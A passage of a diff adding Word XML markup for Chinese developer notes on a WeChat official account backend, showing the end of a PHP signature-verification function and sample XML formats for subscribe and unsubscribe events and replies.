+              <w:t>==$signature){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>header</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>('</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>content-type:text</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>');</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve">echo </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>$_GET['</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>echostr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>'];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>return true</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>else</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>return false</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="0070C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>?&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>&lt;!</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>—</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>用于屏蔽新浪云的实名认证标签</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>关注事件推送和回复</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>事件和回复都是</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>xml</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>格式，接收</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>xml</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>判断后回复</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>xml</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>格式数据即可：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>事件格式：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:ind w:firstLineChars="200" w:firstLine="440"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&lt;xml&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>ToUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;&lt;![CDATA[</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>toUser</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>]]&gt;&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>ToUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>FromUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;&lt;![CDATA[</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>FromUser</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>]]&gt;&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>FromUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>CreateTime</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;123456789&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>CreateTime</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>MsgType</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;&lt;![CDATA[event]]&gt;&lt;/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>MsgType</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Event&gt;&lt;![CDATA[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>subscribe</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>或</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>unsubscribe</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>]]&gt;&lt;/Event&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;/xml&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>回复格式：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:ind w:firstLineChars="200" w:firstLine="440"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&lt;xml&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="AD95AF"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+              </w:rPr>
+              <w:t>ToUserName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
